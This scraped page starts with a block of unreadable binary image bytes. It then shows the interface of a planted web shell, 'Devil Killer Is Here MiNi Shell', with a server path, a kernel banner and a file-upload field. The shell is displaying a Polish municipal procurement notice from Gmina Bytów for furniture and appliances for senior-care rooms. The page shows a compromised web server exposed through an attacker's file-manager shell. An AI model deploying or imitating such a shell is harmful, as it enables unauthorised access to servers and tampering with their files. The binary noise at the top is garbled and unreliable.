JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220622/0021935801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Doposaż. świetlic na terenie g. Bytów w ram. realiz. proj. „Senio-RITA - Rehabilit., Integracja, Teleopieka i Asystentura dla seniorów, niepełnospr., przew. chorych i ich opiekunów w pow. bytowskim” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bytów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979499</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598222011</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@bytow.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.bytow.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Doposaż. świetlic na terenie g. Bytów w ram. realiz. proj. „Senio-RITA - Rehabilit., Integracja, Teleopieka i Asystentura dla seniorów, niepełnospr., przew. chorych i ich opiekunów w pow. bytowskim” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d18db433-f221-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00219358</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025026/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Doposażenie świetlic gminy Bytów - SENIORITA (dostawa mebli)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „Senio-RITA - Rehabilitacja, Integracja, Teleopieka i Asystentura dla seniorów, niepełnosprawnych, przewlekle chorych i ich opiekunów w powiecie bytowskim”, współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: urzad@bytow.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod adresem:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP) dostępnych pod adresem:<br/>https://www.gov.pl/web/gov/warunkikorzystania. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., pełnomocnictwa, podmiotowe środki dowodowe, sporządza się w postaci elektronicznej, w ogólnie<br/>dostępnych formatach danych, w szczególności w formatach: .rtf, .pdf, .doc, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest burmistrz Bytowa z siedzibą: Urząd Miejski w Bytowie, ul. 1 Maja 15, 77-100 Bytów, tel. 59 822 20 11, email: urzad@bytow.com.pl;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem email: iod@bytow.com.pl; <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8)	posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BRZ.271.17.2022.AZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia<br/> W ramach realizacji przedmiotu części I zamówienia wymagana jest dostawa i montaż do punktu świadczenia usług społecznych przy ul. Młyńskiej 8 w Bytowie:<br/>- zestaw mebli kuchennych wraz z wyspą kuchenną, wykonanych i zamontowanych zgodnie z załącznikami graficznymi stanowiącymi Załączniki nr 6 i nr 7 do SWZ (bez zlewu w szafie porządkowej - poza niniejszym zakresem): <br/>a) szafa porządkowa o wymiarach 120 cm szerokości, 33 cm i 75 cm głębokości oraz 216 cm wysokości, dwudrzwiowa, wewnątrz dzielona na dwie przestrzenie, ze ścianami bocznymi <br/>z płyt meblowych, na montowana na ścianie, na której znajduje się zlew (ma znajdować się wewnątrz szafy porządkowej), front zlicowany z zabudową powyżej szafek oraz zabudową komina wentylacyjnego; <br/>b) w ciągu roboczym kuchennym lodówka w zabudowie, szafka nad lodówką, drzwi otwierane uchylnie do góry, wysokość 36 cm, szerokość 60 cm, zmywarka podblatowa, szafka o szerokości 60 cm, wysokości 71 cm, z dwoma szufladami na prowadnicach, pierwsza 18 cm wysokości, druga 53 cm, dwie jednakowe szafki o szerokości 60 cm każda, z trzema szufladami każda, pierwsze dwie szuflady wysokość po 18 cm, ostatnia szuflada 35 cm wysokości, szafka 60 cm szerokości, wysokości 71 cm, z dwoma szufladami, pierwsza 18 cm, druga 53 cm, szafka o szerokości 40 cm, wysokości 71 cm, z dwoma szufladami, pierwsza 18 cm, druga 53 cm, szafka słupek o szerokości 60 cm i wysokości 216 cm, na dole szafka otwierana o wysokości 71 cm, następnie piekarnik i mikrofalówka w zabudowie i szafka otwierana uchylnie od dołuo wysokości 36 cm, szafka wisząca 40 cm szerokości, dalej 5 szafek wiszących o głębokości 30 cm, otwieranych na bok, z trzema półkami każda, przy czym jedna szafka z okapem w zabudowie, bez półek; <br/>c) należy przewidzieć zabudowę z płyty meblowej (tej samej co fronty szafek kuchennych), obejmującą przestrzeń o wysokości 10 cm nad szafą porządkową i szafkami wiszącymi oraz komin wentylacyjny (komin obudowany z dwóch stron) oraz listwę maskującą poniżej mebli kuchennych zgodnie z rysunkiem stanowiącym Załącznik nr 6 do SWZ; <br/>d) wyspa kuchenna wykonana zgodnie z projektem stanowiącym Załącznik nr 7 do SWZ, z jednej strony otwarte półki, z drugiej otwarte półki i szuflady, rama stalowa z rury 20/20 mm, kolor ciemny grafit, półki w ramie stalowej z blachy perforowanej, kolor naturalny stalowy;<br/>e) korpusy i fronty szafek z płyty meblowej laminowanej w kolorze jednolity szary, fronty lakierowane matowe, <br/>f) uchwyty meblowe listwowe, kolor naturalny stalowy;<br/>g) blaty z laminatu koloru ciemny grafit, brzegi wykończone listwą stalową w kolorze naturalnym, zlew wokół zasilikonowany dopuszczalna inna forma zabezpieczenia blatu od strony zlewu pod warunkiem uzgodnienia i akceptacji Zamawiającego na etapie wykonawstwa;<br/>h) ściana powyżej blatu wyłożona blachą stalową w kolorze naturalnym;<br/>Meble należy zamontować w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 6 do SWZ, zgodnie z zasadami montażu mebli, a także dostarczyć i zamontować sprzęt AGD pod zabudowę, o parametrach wskazanych poniżej.<br/>- chłodziarka pod zabudowę, wymiary (wys. x szer. x gł.) 177,2 x 54,8 x 54,9 cm, pojemność chłodziarki 311 l, sposób odszraniania chłodziarki: automatyczny, sterowanie elektroniczne, szybkie chłodzenie, zmiana kierunku otwierania drzwi;<br/>- zmywarka do zabudowy o wymiarach 60 cm szerokości, 71 cm wysokości, głębokość urządzenia pozwalająca na zlicowanie frontu zmywarki z frontami szafek, programy: mycie wnętrza zmywarki, Eco, 90 min., szybki 30 min., 60 min., 160 min., AutoSense, płukanie i wstrzymanie, 3 poziomy: kosz górny, dolny, szuflada na sztućce, pobierana moc: max 1950 W, klasa efektywności energetycznej: A+++, D;<br/>- kuchenka mikrofalowa pod zabudowę z funkcją grilla, kolor czarny, max pobierana moc [W]: 1400, moc mikrofal: 900 W, moc grilla: 1000 W, mechanizm otwierania drzwi: przycisk, wyświetlacz LED, średnica i rodzaj talerza obrotowego: 270 mm, szkło, szerokość 60 cm, głębokość 57 cm, wysokość 46 cm;<br/>- piekarnik elektryczny, parowy, pod zabudowę, chowane pokrętła, blachy dołączone do piekarnika: 1 emaliowana blacha, 1 emaliowana brytfanna, zakres temperatur: 50°C - 275°C, całkowity pobór mocy [W]: 3500 , klasa efektywności energetycznej: A+, wymiary: wys. 60 cm, szer. 60 cm, gł. 57 cm;<br/>- płyta indukcyjna, wymiary [mm] 590 x 520, 4 strefy grzejne, podświetlane sterowanie, funkcja odliczania czasu, wykrywanie obecności garnka;<br/>- zlew jednokomorowy stalowy z ociekaczem, wbudowywany, zestaw odpływowy z syfonem w komplecie, zawór mimośrodowy z sitkiem 3,5&#34;, bateria chromowana, stojąca, jednodźwigniowa, wys. korpusu 350 mm, wysokość wylewki 265 mm, obrót wylewki możliwy w zakresie 360 stopni;<br/>- okap kuchenny podszafkowy, przeznaczony do montażu w wiszącej szafce, obwodowy system zasysania zwiększający możliwości filtrowania, aluminiowe filtry, kolor: stal szlachetna, wykończenie: stal nierdzewna, oświetlenie ledowe, poziom hałasu: max 65 dB, wymiary (SxWxG) 51,4 x 30,2 x 28,2 cm;<br/>- 6 stołów 6-osobowych, wymiary: blat o wymiarach 140x90 cm, wysokość 76 cm, płyta laminowana, kolorystyka blatu ciemny grafit, nogi kolor naturalny stalowy;<br/>- 37 krzeseł bankietowych, stalowy stelaż, gładka tapicerka w kolorze czarnym, materiał plamoodporny, możliwość sztaplowania, wysokość całkowita: 93 cm, wysokość do siedziska: 46 cm, szerokość całkowita: 44 cm, owalne oparcie;<br/><br/>- szafa dwudrzwiowa w stylu loftowym, rama stalowa z rury 20/20 mm, kolor ciemny grafit, zestaw na odzież wierzchnią w sali, wymiary: 160x200x60 cm, stalowy drążek, jednolity kolor szary, korpus i front lakierowany matowy, uchwyty listwowe, kolor naturalny stalowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie ze SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia<br/>W ramach realizacji przedmiotu części II zamówienia wymagana jest dostawa i montaż mebli do punktu świadczenia usług społecznych przy ul. Młyńskiej 8 w Bytowie: <br/>- zestaw B według załączników graficznych stanowiących Załączniki nr 8 i nr 9 do SWZ (bez zlewu - poza niniejszym zakresem),w stylu loftowym, zestaw składa się z 5 półek wiszących na jednej wysokości, każda z półek długość 60 cm, wysokość 36 cm, głębokość 30 cm, łączny wymiar zestawu długość 300 cm, wysokość 36 cm, głębokość 30 cm, szafki stojące otwierane z boku, pierwsza o wymiarze długość 60 cm, wysokość 90 cm, głębokość 40 cm, z koniecznością wkomponowania zlewu istniejącego w blat, następnie dwie szafki dwudrzwiowe, otwierane z boku od wewnątrz, z półkami o wymiarach dwie półki dolne o długości 60 cm, wysokości 42 cm i głębokości 40 cm oraz dwie półki górne o wymiarach długość 60 cm, szerokość 30 cm, głębokość 40 cm, blat zabezpieczony listwami plastikowymi od ścian oraz listwami zakończeniowymi; meble należy zamontować w miejscach wskazanych na rysunku pomocniczym, zgodnie z zasadami montażu mebli, dół szafek należy zabezpieczyć listwami maskującymi, kolorystyka blatu ciemny grafit, z laminatu HPL, rama stalowa z rury 20/20 mm, kolor ciemny grafit, półki w ramie stalowej z blachy perforowanej, kolor naturalny stalowy, korpusy i fronty szafek z płyty laminowanej, kolor jednolity szary, fronty lakierowane matowe, uchwyty listwowe, kolor naturalny stalowy,<br/>- zestaw C według załączników graficznych stanowiących Załączniki nr 8 i nr 10 do SWZ, w stylu loftowym, meble biurowe w kształcie wskazanym na rysunkach, o szerokości 50 cm, wysokości 105 cm i łącznej długości ciągu 479 cm, w formie otwartych regałów z płytą laminowaną w miejscach wskazanych na rysunku, całość z elementami ruchomymi w miejscach wskazanych na rysunkach, meble należy zamontować w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 8 do SWZ, zgodnie z zasadami montażu mebli, kolorystyka blatu ciemny grafit, z laminatu HPL, na odcinku nad ruchomą szafką blat podnoszony do góry na zawiasach bocznych dostosowanych do rozmiaru i ciężaru blatu, ramy mebli wykonane z rury stalowej 20/20 mm, kolor ciemny grafit, rama stalowa z rury 20/20 mm, kolor ciemny grafit, półki w ramie stalowej z blachy perforowanej, kolor naturalny stalowy, korpusy i fronty szafek kolor jednolity szary, z płyty laminowanej, fronty lakierowane matowe, w miejscach wskazanych na rysunku regały zabezpieczone płytą od podłogi do blatu, kolor jednolity szary, z płyty laminowanej, lakierowane matowe;<br/>- zestaw D według załączników graficznych stanowiących Załączniki nr 8 i nr 10 do SWZ, w stylu loftowym, biurko o wysokości 75 cm, szerokości 130 cm i głębokości 60 cm, następnie dwa rzędy pionowe szuflad po dwie szuflady w każdym rzędzie, każda z szuflad o długości 40 cm, wysokości 30,5 cm i głębokości 60 cm, meble należy zamontować w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 8 do SWZ, zgodnie z zasadami montażu mebli, dół szafek należy zabezpieczyć listwami maskującymi, kolorystyka blatu ciemny grafit, blat laminat HPL, ramy mebli wykonane z rury stalowej 20/20 mm, kolor ciemny grafit, korpusy i fronty szafek kolor jednolity szary, z płyty laminowanej, fronty lakierowane matowe, uchwyty listwowe, kolor naturalny stalowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble 